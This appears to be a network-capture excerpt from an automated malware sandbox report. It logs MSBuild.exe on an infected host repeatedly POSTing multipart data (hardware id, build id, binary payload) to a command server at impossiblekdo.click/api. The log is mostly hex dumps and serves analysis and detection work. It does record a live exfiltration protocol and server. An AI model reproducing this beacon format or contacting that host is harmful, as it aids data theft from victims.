server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1703&rtt_var=643&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=957&delivery_rate=1714621&cwnd=181&unsent_bytes=0&cid=cae32803c7c6136e&ts=493&x=0"
2025-01-05 18:38:10 UTC	244	IN	Data Raw: 34 36 37 0d 0a 54 35 66 70 4c 6e 51 65 39 57 53 35 77 68 44 6d 47 38 6e 64 6c 63 64 68 2b 61 6b 48 74 48 43 67 6f 37 74 4a 74 49 70 67 71 33 67 30 74 5a 38 4d 54 69 72 5a 52 73 71 6e 4d 74 78 76 75 36 6a 77 36 30 4f 59 7a 53 57 4f 46 73 48 50 79 43 79 59 71 42 62 47 57 6e 58 78 69 45 49 48 65 39 6c 47 33 4c 6f 79 33 45 43 79 2f 2f 43 70 51 38 4f 4c 59 74 34 53 77 63 2f 5a 4b 4e 2f 6c 45 4d 63 62 4a 2f 75 4f 52 68 46 39 6b 51 58 56 72 33 57 44 66 71 69 33 2b 36 34 4d 6b 63 51 6c 6d 46 4c 46 32 5a 6c 7a 6c 73 63 46 33 78 6b 43 39 70 70 46 56 6d 50 5a 48 35 75 6e 66 73 51 68 36 37 7a 77 70 51 32 66 7a 57 7a 63 47 4d 6a 48 32 43 33 65 2b 67 6e 4e 45 43 66 31 6a 55 63 62 64 49 55 49 33 36 68 2b 68 58 53 6f 2f 37 6e 6c 42 49 4f Data Ascii: 467T5fpLnQe9WS5whDmG8ndlcdh+akHtHCgo7tJtIpgq3g0tZ8MTirZRsqnMtxvu6jw60OYzSWOFsHPyCyYqBbGWnXxiEIHe9lG3Loy3ECy//CpQ8OLYt4Swc/ZKN/lEMcbJ/uORhF9kQXVr3WDfqi3+64MkcQlmFLF2ZlzlscF3xkC9ppFVmPZH5unfsQh67zwpQ2fzWzcGMjH2C3e+gnNECf1jUcbdIUI36h+hXSo/7nlBIO
2025-01-05 18:38:10 UTC	890	IN	Data Raw: 4c 50 5a 5a 42 38 4d 4c 49 4f 73 50 6c 45 73 39 61 4d 72 75 53 44 42 46 77 31 31 36 62 71 48 36 4b 66 4b 69 77 38 4b 51 44 69 63 52 6c 31 52 72 4b 78 64 4d 6b 32 65 63 4d 77 78 30 6c 2f 49 78 44 45 58 53 52 43 64 6a 67 50 4d 52 2b 73 2f 2b 76 35 53 4f 4c 79 47 62 43 48 39 4f 42 78 6d 58 50 71 41 58 46 57 6e 57 31 6a 55 49 58 63 5a 63 55 30 36 74 35 67 57 75 67 74 76 71 6f 41 35 62 42 61 74 55 53 78 63 76 54 4a 4e 7a 73 44 38 51 63 4c 66 58 4c 41 6c 5a 37 6a 30 61 44 34 46 47 42 61 61 79 7a 34 65 63 35 32 39 51 72 7a 31 4c 46 7a 5a 6c 7a 6c 75 41 48 79 68 6b 6d 2b 6f 68 45 48 57 36 58 46 4e 32 74 64 35 5a 2f 72 72 48 39 70 68 47 52 78 57 50 56 47 38 6e 49 33 43 7a 53 71 45 79 4a 48 54 57 31 30 77 77 33 63 5a 77 4b 30 62 64 79 78 47 62 6c 70 72 65 69 44 39 Data Ascii: LPZZB8MLIOsPlEs9aMruSDBFw116bqH6KfKiw8KQDicRl1RrKxdMk2ecMwx0l/IxDEXSRCdjgPMR+s/+v5SOLyGbCH9OBxmXPqAXFWnW1jUIXcZcU06t5gWugtvqoA5bBatUSxcvTJNzsD8QcLfXLAlZ7j0aD4FGBaayz4ec529Qrz1LFzZlzluAHyhkm+ohEHW6XFN2td5Z/rrH9phGRxWPVG8nI3CzSqEyJHTW10ww3cZwK0bdyxGblpreiD9
2025-01-05 18:38:10 UTC	1369	IN	Data Raw: 34 35 32 64 0d 0a 37 69 76 53 72 44 5a 7a 64 4a 63 6c 63 32 34 48 65 4a 35 61 77 51 73 59 56 49 76 32 4c 54 52 4a 78 6b 77 66 57 72 48 75 48 64 61 65 33 2b 71 6b 48 6c 4d 4e 74 31 52 72 51 7a 39 63 74 30 4f 67 48 69 56 52 74 38 70 4d 4d 54 6a 79 7a 43 4d 79 30 65 63 5a 4d 71 4c 48 35 6f 68 58 62 31 43 76 50 55 73 58 4e 6d 58 4f 57 35 67 2f 43 46 69 72 38 69 6b 38 57 64 70 6b 4a 30 61 68 36 68 48 53 71 74 50 2b 6a 44 70 44 45 61 74 45 61 77 63 33 63 4a 74 57 6f 54 49 6b 64 4e 62 58 54 44 44 4e 79 6c 42 66 4b 34 6b 65 48 64 36 57 34 34 65 55 63 31 64 49 6c 30 52 36 43 6d 5a 6b 68 30 65 38 47 78 42 41 75 38 59 39 42 47 58 57 65 44 38 6d 71 66 6f 70 72 70 72 58 79 71 77 2b 65 78 47 58 58 45 38 7a 4c 30 6d 75 59 71 41 58 52 57 6e 57 31 70 45 45 47 62 70 30 4e Data Ascii: 452d7ivSrDZzdJclc24HeJ5awQsYVIv2LTRJxkwfWrHuHdae3+qkHlMNt1RrQz9ct0OgHiVRt8pMMTjyzCMy0ecZMqLH5ohXb1CvPUsXNmXOW5g/CFir8ik8WdpkJ0ah6hHSqtP+jDpDEatEawc3cJtWoTIkdNbXTDDNylBfK4keHd6W44eUc1dIl0R6CmZkh0e8GxBAu8Y9BGXWeD8mqfoprprXyqw+exGXXE8zL0muYqAXRWnW1pEEGbp0N
2025-01-05 18:38:10 UTC	1369	IN	Data Raw: 52 2b 73 2f 2b 76 35 53 79 59 33 57 2b 57 44 59 7a 59 6d 53 7a 61 71 46 71 4a 45 43 48 78 69 45 41 66 63 4a 6f 48 33 36 64 2f 67 48 6d 74 75 66 4b 6b 43 4a 50 48 61 74 77 65 78 73 33 51 4c 64 72 72 41 63 39 61 59 37 57 4d 56 46 59 6b 31 79 66 57 71 33 36 45 65 72 71 34 74 2b 74 44 6c 63 31 6c 6c 6b 72 55 30 63 34 73 79 61 59 62 69 52 30 68 74 64 4d 4d 48 47 36 53 43 4e 2b 71 64 34 42 31 6f 62 2f 79 74 77 75 64 7a 47 6e 65 46 38 33 48 33 43 62 52 34 77 48 62 43 43 37 78 68 55 42 57 4d 74 63 42 77 2b 41 71 78 46 79 38 76 4f 65 6a 41 4e 76 55 4b 38 39 53 78 63 32 5a 63 35 62 6f 44 4d 55 52 4b 76 36 41 53 42 4a 38 6d 67 33 56 72 6e 75 49 63 61 65 34 35 61 67 47 6b 38 46 73 30 78 37 50 77 73 73 6f 31 36 68 4d 69 52 30 31 74 64 4d 4d 4d 55 2b 67 4a 5a 75 2f 50 Data Ascii: R+s/+v5SyY3W+WDYzYmSzaqFqJECHxiEAfcJoH36d/gHmtufKkCJPHatwexs3QLdrrAc9aY7WMVFYk1yfWq36Eerq4t+tDlc1llkrU0c4syaYbiR0htdMMHG6SCN+qd4B1ob/ytwudzGneF83H3CbR4wHbCC7xhUBWMtcBw+AqxFy8vOejANvUK89Sxc2Zc5boDMURKv6ASBJ8mg3VrnuIcae45agGk8Fs0x7Pwsso16hMiR01tdMMMU+gJZu/P
2025-01-05 18:38:10 UTC	1369	IN	Data Raw: 6e 74 2f 31 44 74 38 68 71 33 56 4c 64 6a 38 42 72 30 65 52 43 6b 56 6f 71 2f 59 4e 43 46 58 71 63 43 74 65 68 65 34 4a 38 6f 37 6a 34 6f 67 71 63 79 32 50 45 46 63 2f 49 32 53 44 66 34 67 62 49 45 57 32 37 79 30 73 4f 50 4d 39 47 36 61 64 6b 6c 48 72 72 6f 4c 6d 38 51 35 7a 48 4a 59 35 53 7a 39 50 59 4c 73 54 73 44 63 49 49 4a 76 4f 4c 53 51 52 37 6d 77 7a 55 6f 33 71 4a 65 71 4f 74 39 36 67 44 69 64 6c 6a 33 52 79 43 6a 35 6b 73 7a 71 68 61 69 53 73 36 2f 73 74 54 57 47 58 58 41 64 66 67 4b 73 52 36 6f 62 4c 35 74 77 65 64 77 47 62 59 47 73 66 4a 33 53 48 62 35 77 6e 44 45 79 58 31 68 45 6b 65 64 35 45 49 32 71 5a 2b 69 54 6e 6c 2f 2f 43 39 51 38 4f 4c 51 73 77 66 78 4e 62 49 48 74 48 6f 55 34 6b 46 59 2b 7a 4c 53 78 6f 38 7a 30 62 57 72 48 69 4a 66 4b Data Ascii: nt/1Dt8hq3VLdj8Br0eRCkVoq/YNCFXqcCtehe4J8o7j4ogqcy2PEFc/I2SDf4gbIEW27y0sOPM9G6adklHrroLm8Q5zHJY5Sz9PYLsTsDcIIJvOLSQR7mwzUo3qJeqOt96gDidlj3RyCj5kszqhaiSs6/stTWGXXAdfgKsR6obL5twedwGbYGsfJ3SHb5wnDEyX1hEked5EI2qZ+iTnl//C9Q8OLQswfxNbIHtHoU4kFY+zLSxo8z0bWrHiJfK
2025-01-05 18:38:10 UTC	1369	IN	Data Raw: 48 4e 58 53 4a 64 45 65 67 70 6d 5a 4a 64 76 75 41 38 67 53 4a 66 57 4e 52 68 4a 2f 6e 67 58 63 71 58 53 50 65 71 47 77 38 4b 4d 48 6d 38 42 69 32 42 54 48 79 74 42 72 6d 4b 67 46 30 56 70 31 74 61 31 76 42 47 36 6c 43 4e 69 37 4d 70 73 33 73 76 2f 77 71 55 50 44 69 32 37 65 48 64 44 45 30 43 50 53 34 51 4c 4e 45 43 44 79 69 30 6b 62 65 5a 4d 49 33 36 64 79 69 48 61 73 74 2f 69 68 41 35 53 4c 4b 35 59 56 32 6f 47 42 61 2f 62 6a 46 4f 67 55 4a 75 66 4c 55 31 68 6c 31 77 48 58 34 43 72 45 64 36 4b 2b 2f 36 73 50 6b 38 39 33 31 68 6e 4c 7a 74 67 6b 31 75 73 44 77 78 49 2f 38 34 74 48 48 6e 75 66 41 74 57 79 63 34 73 35 35 66 2f 77 76 55 50 44 69 31 54 41 46 63 58 4f 6d 77 4c 52 38 77 50 44 47 53 62 35 79 31 4e 59 5a 64 63 42 31 2b 41 71 78 48 53 6e 73 76 4f Data Ascii: HNXSJdEegpmZJdvuA8gSJfWNRhJ/ngXcqXSPeqGw8KMHm8Bi2BTHytBrmKgF0Vp1ta1vBG6lCNi7Mps3sv/wqUPDi27eHdDE0CPS4QLNECDyi0kbeZMI36dyiHast/ihA5SLK5YV2oGBa/bjFOgUJufLU1hl1wHX4CrEd6K+/6sPk8931hnLztgk1usDwxI/84tHHnufAtWyc4s55f/wvUPDi1TAFcXOmwLR8wPDGSb5y1NYZdcB1+AqxHSnsvO
2025-01-05 18:38:10 UTC	1369	IN	Data Raw: 47 6d 57 53 6f 4c 4b 31 79 37 58 35 41 6a 4f 46 44 2f 30 67 55 41 58 65 35 41 4e 79 61 74 67 6a 33 47 6f 73 66 2b 73 41 35 58 4c 5a 4e 73 53 67 6f 2b 5a 4c 4d 36 6f 57 6f 6b 2f 44 75 4b 64 52 6c 52 66 67 42 44 52 70 33 36 53 63 71 71 38 34 61 67 54 32 34 55 6c 78 78 58 54 67 59 45 39 78 76 38 46 31 6c 51 30 74 59 78 41 56 69 54 58 44 64 53 75 66 34 39 39 6f 72 72 2f 70 67 61 65 77 57 6e 61 45 38 72 49 30 79 37 54 37 67 6a 4b 46 43 4c 30 68 30 67 66 63 70 35 47 6c 65 42 31 6e 44 6e 7a 2f 38 47 31 42 49 50 47 64 5a 51 67 77 64 44 49 50 74 76 34 42 49 73 31 4c 76 6d 49 53 52 46 73 31 78 6d 56 75 54 4b 44 64 65 76 6e 74 36 55 48 6c 38 68 69 32 42 33 50 7a 74 34 67 32 65 49 4d 32 78 55 6f 2f 59 64 45 47 32 36 64 44 4d 6d 70 65 34 6c 33 6f 36 33 30 35 55 33 62 Data Ascii: GmWSoLK1y7X5AjOFD/0gUAXe5ANyatgj3Gosf+sA5XLZNsSgo+ZLM6oWok/DuKdRlRfgBDRp36Scqq84agT24UlxxXTgYE9xv8F1lQ0tYxAViTXDdSuf499orr/pgaewWnaE8rI0y7T7gjKFCL0h0gfcp5GleB1nDnz/8G1BIPGdZQgwdDIPtv4BIs1LvmISRFs1xmVuTKDdevnt6UHl8hi2B3Pzt4g2eIM2xUo/YdEG26dDMmpe4l3o6305U3b
2025-01-05 18:38:10 UTC	1369	IN	Data Raw: 4b 61 2b 4a 6c 6a 6c 74 64 4d 69 51 4a 74 72 63 74 35 46 58 4b 5a 41 63 32 78 50 36 56 30 6f 4c 50 36 71 67 6a 62 68 53 58 51 55 70 71 52 6c 32 76 53 2b 55 4b 52 53 6e 2b 75 33 68 39 42 4c 4d 55 5a 6c 62 6b 79 6b 6a 6e 7a 37 62 6e 6c 45 64 75 54 4a 5a 45 52 30 4e 50 66 4b 4d 44 72 52 66 63 6b 44 75 4b 64 52 67 30 2b 73 51 48 4b 71 57 53 4a 61 35 57 42 32 61 67 43 6d 4d 55 6e 35 77 54 50 30 64 6f 75 30 64 59 38 78 78 30 35 38 6f 56 4b 46 6a 7a 5a 52 74 54 67 4b 72 30 35 34 2f 2f 49 36 30 4f 44 69 7a 32 57 4a 38 48 50 31 79 7a 41 2b 55 2f 71 44 54 76 2f 6b 41 34 77 65 34 59 50 7a 61 31 67 78 44 66 72 75 62 66 39 55 39 57 4c 59 63 64 53 6d 70 47 4c 63 49 4f 37 56 5a 6c 49 4d 72 75 53 44 41 41 38 7a 31 53 56 34 47 44 45 49 65 76 34 39 4c 63 52 6e 63 68 7a 31 Data Ascii: Ka+JljltdMiQJtrct5FXKZAc2xP6V0oLP6qgjbhSXQUpqRl2vS+UKRSn+u3h9BLMUZlbkykjnz7bnlEduTJZER0NPfKMDrRfckDuKdRg0+sQHKqWSJa5WB2agCmMUn5wTP0dou0dY8xx058oVKFjzZRtTgKr054//I60ODiz2WJ8HP1yzA+U/qDTv/kA4we4YPza1gxDfrubf9U9WLYcdSmpGLcIO7VZlIMruSDAA8z1SV4GDEIev49LcRnchz1
2025-01-05 18:38:10 UTC	1369	IN	Data Raw: 5a 4c 38 65 6f 57 70 6c 49 64 71 44 59 47 30 59 75 69 45 6a 43 34 47 54 45 49 66 6e 78 74 37 64 44 77 34 73 69 31 51 44 51 78 39 6f 39 31 61 38 38 39 79 38 75 2b 34 56 4c 41 45 6d 55 46 39 69 67 65 62 70 48 69 72 48 38 6f 67 2b 4e 39 56 76 6a 45 63 7a 50 33 6a 33 48 71 45 79 4a 46 57 32 74 73 67 78 65 50 4b 68 49 6d 37 67 79 33 44 6d 65 76 50 6d 72 42 49 33 61 4b 4f 4d 52 30 38 4c 5a 49 4a 61 6d 51 73 39 61 64 61 66 46 44 42 4a 74 31 31 36 4c 38 69 6e 52 4b 76 7a 76 70 62 70 4e 67 6f 74 7a 6c 6b 71 51 6a 35 6b 35 6c 72 42 43 6a 68 6b 2f 35 34 31 50 41 48 2f 51 4f 4f 57 47 63 59 4e 2f 71 4c 48 67 74 45 47 30 79 47 37 61 48 73 58 58 35 78 58 44 36 77 7a 48 48 54 76 6b 79 77 4a 57 63 39 64 65 34 75 42 6a 6a 6e 37 6e 39 37 75 30 45 4a 58 41 63 39 46 53 2f 59 Data Ascii: ZL8eoWplIdqDYG0YuiEjC4GTEIfnxt7dDw4si1QDQx9o91a889y8u+4VLAEmUF9igebpHirH8og+N9VvjEczP3j3HqEyJFW2tsgxePKhIm7gy3DmevPmrBI3aKOMR08LZIJamQs9adafFDBJt116L8inRKvzvpbpNgotzlkqQj5k5lrBCjhk/541PAH/QOOWGcYN/qLHgtEG0yG7aHsXX5xXD6wzHHTvkywJWc9de4uBjjn7n97u0EJXAc9FS/Y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49709	188.114.97.3	443	7100	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:38:10 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=N2IA27ZY6QCW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12806 Host: impossiblekdo.click
2025-01-05 18:38:10 UTC	12806	OUT	Data Raw: 2d 2d 4e 32 49 41 32 37 5a 59 36 51 43 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 38 32 44 38 39 30 46 44 38 37 39 41 35 43 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 4e 32 49 41 32 37 5a 59 36 51 43 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 32 49 41 32 37 5a 59 36 51 43 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6f 68 64 62 6b 6f 79 67 76 76 65 65 0d 0a 2d 2d 4e 32 49 41 32 37 5a Data Ascii: --N2IA27ZY6QCWContent-Disposition: form-data; name="hwid"2682D890FD879A5C6D75A801C764DBB8--N2IA27ZY6QCWContent-Disposition: form-data; name="pid"2--N2IA27ZY6QCWContent-Disposition: form-data; name="lid"LPnhqo--ohdbkoygvvee--N2IA27Z
2025-01-05 18:38:11 UTC	1136	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:38:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=10ps6e2jvnupcuur03ofv1r6o2; expires=Thu, 01 May 2025 12:24:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XcHIrelaDLoy%2Ftvh%2BwCzQNMzUDqChnGJiWat1fKAVF%2FVjCcFWWAUCAjR1%2FRLUDHyhUcPA%2BPPDR6PC6qmCU99A%2FpAD8LYAGodSXgFYV0dvd7TU1jJVFFdRd%2F1QZhRz3BkM6pa3HYA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5957639bf431c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1591&rtt_var=604&sent=7&recv=18&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13743&delivery_rate=1802469&cwnd=237&unsent_bytes=0&cid=3abdcb6ca689419d&ts=570&x=0"
2025-01-05 18:38:11 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:38:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49710	188.114.97.3	443	7100	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:38:11 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QUR1YTWRHZ9SURB2S8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15084 Host: impossiblekdo.click
2025-01-05 18:38:11 UTC	15084	OUT	Data Raw: 2d 2d 51 55 52 31 59 54 57 52 48 5a 39 53 55 52 42 32 53 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 38 32 44 38 39 30 46 44 38 37 39 41 35 43 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 51 55 52 31 59 54 57 52 48 5a 39 53 55 52 42 32 53 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 55 52 31 59 54 57 52 48 5a 39 53 55 52 42 32 53 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6f 68 64 62 6b Data Ascii: --QUR1YTWRHZ9SURB2S8Content-Disposition: form-data; name="hwid"2682D890FD879A5C6D75A801C764DBB8--QUR1YTWRHZ9SURB2S8Content-Disposition: form-data; name="pid"2--QUR1YTWRHZ9SURB2S8Content-Disposition: form-data; name="lid"LPnhqo--ohdbk
2025-01-05 18:38:12 UTC	1130	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:38:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=prm8otcgevfggcifg2mj922af7; expires=Thu, 01 May 2025 12:24:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KGXgVfGsSr76pqNlWM7q9LNhIAO70xetdFK2ZS3Bf4t3vmQfJ9KMvKBvsMLBVosOoiMgVCiMetvpB%2FtLW3rIowPyjzkjyHI5xM86%2BHUxh8PJpflQXxgEHsC6jWVk2xlqkD%2B2hL%2B0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5957cde578cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=2032&rtt_var=763&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2847&recv_bytes=16027&delivery_rate=1433480&cwnd=242&unsent_bytes=0&cid=15384f90497d6c9c&ts=557&x=0"
2025-01-05 18:38:12 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:38:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49711	188.114.97.3	443	7100	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:38:13 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5RVE3WIIQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20520 Host: impossiblekdo.click
2025-01-05 18:38:13 UTC	15331	OUT	Data Raw: 2d 2d 35 52 56 45 33 57 49 49 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 38 32 44 38 39 30 46 44 38 37 39 41 35 43 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 35 52 56 45 33 57 49 49 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 35 52 56 45 33 57 49 49 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6f 68 64 62 6b 6f 79 67 76 76 65 65 0d 0a 2d 2d 35 52 56 45 33 57 49 49 51 0d 0a 43 6f 6e 74 65 Data Ascii: --5RVE3WIIQContent-Disposition: form-data; name="hwid"2682D890FD879A5C6D75A801C764DBB8--5RVE3WIIQContent-Disposition: form-data; name="pid"3--5RVE3WIIQContent-Disposition: form-data; name="lid"LPnhqo--ohdbkoygvvee--5RVE3WIIQConte
2025-01-05 18:38:13 UTC	5189	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: un 4F([:7s~X`nO`i
2025-01-05 18:38:13 UTC	1133	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:38:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=irqom9b70g2ga6t83b2hp2emn3; expires=Thu, 01 May 2025 12:24:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JS42DF7RrZI6swz67N7aBomXxO7E1mBIwR1FduDlxIrvXkk0A%2F3oefgD%2FSCdDVnC2tMtbC6K8zmaql9ULpaD%2FA%2FsUAKCQ8aCLQB71x4Qws6NqImC9FEUxvy5IZtaGhfi%2FFBNcRbq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd59583addb42a5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1748&min_rtt=1743&rtt_var=665&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21476&delivery_rate=1631284&cwnd=229&unsent_bytes=0&cid=385571dd1c32a76e&ts=634&x=0"
2025-01-05 18:38:13 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:38:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49713	188.114.97.3	443	7100	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:38:14 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=44JGQU7AQPCF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1220 Host: impossiblekdo.click
2025-01-05 18:38:14 UTC	1220	OUT	Data Raw: 2d 2d 34 34 4a 47 51 55 37 41 51 50 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 38 32 44 38 39 30 46 44 38 37 39 41 35 43 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 34 34 4a 47 51 55 37 41 51 50 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 34 4a 47 51 55 37 41 51 50 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 